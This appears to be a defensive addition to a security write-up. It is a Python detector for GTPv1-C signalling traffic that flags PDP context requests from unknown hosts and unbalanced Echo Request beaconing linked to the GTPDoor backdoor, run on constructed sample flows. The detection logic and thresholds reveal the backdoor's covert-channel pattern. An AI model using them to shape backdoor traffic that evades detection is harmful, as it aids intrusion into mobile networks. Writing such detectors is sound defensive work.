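Added example covering detection ideas 1 and 3 above together with the GTPDoor indicators in section 3: a stateful check over (timestamp, src, dst, GTP message type) tuples such as a pcap or IPFIX feed would yield for UDP/2123. The flow records are constructed, the SGSN inventory is an assumption, and nothing here comes from the page's tooling.

```python
from collections import Counter

ECHO_REQ, ECHO_RESP, CREATE_PDP_REQ = 1, 2, 16          # GTPv1-C message types
KNOWN_SGSN = {"10.1.1.10", "10.1.1.11"}                  # assumed inventory of legitimate SGSNs


def detect_gtp_anomalies(records, min_echo=5, echo_ratio=3):
    """records: iterable of (ts, src, dst, msg_type) for UDP/2123 datagrams.

    Returns alert tuples:
      ("create_pdp_from_unknown", src, dst, ts)        -> detection idea 1
      ("unbalanced_echo", host, requests, responses)   -> detection idea 3 / GTPDoor
    """
    echo_req, echo_resp = Counter(), Counter()
    alerts = []
    for ts, src, dst, msg_type in records:
        if msg_type == ECHO_REQ:
            echo_req[src] += 1
        elif msg_type == ECHO_RESP:
            echo_resp[dst] += 1               # the response travels back to the requester
        elif msg_type == CREATE_PDP_REQ and src not in KNOWN_SGSN:
            alerts.append(("create_pdp_from_unknown", src, dst, ts))
    for host, n in echo_req.items():
        # a keep-alive peer answers almost every request; a beaconing host does not
        if n >= min_echo and n > echo_ratio * echo_resp[host]:
            alerts.append(("unbalanced_echo", host, n, echo_resp[host]))
    return alerts


# Constructed sample: a legitimate SGSN<->GGSN keep-alive pair, then a foreign host that
# beacons Echo Requests at the SGSN and finally tries to open a PDP context itself.
SAMPLE = [
    (1.0, "10.1.1.10", "10.2.2.20", ECHO_REQ),
    (1.1, "10.2.2.20", "10.1.1.10", ECHO_RESP),
    (61.0, "10.1.1.10", "10.2.2.20", ECHO_REQ),
    (61.1, "10.2.2.20", "10.1.1.10", ECHO_RESP),
] + [(100.0 + i, "198.51.100.7", "10.1.1.10", ECHO_REQ) for i in range(6)] + [
    (101.0, "10.1.1.10", "198.51.100.7", ECHO_RESP),
    (120.0, "198.51.100.7", "10.2.2.20", CREATE_PDP_REQ),
]

if __name__ == "__main__":
    for alert in detect_gtp_anomalies(SAMPLE):
        print(alert)
```

The thresholds are deliberately loose (five requests, three times more requests than responses) so that a peer with an occasional dropped keep-alive is not flagged; tune them to the Echo interval your SGSNs actually use.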
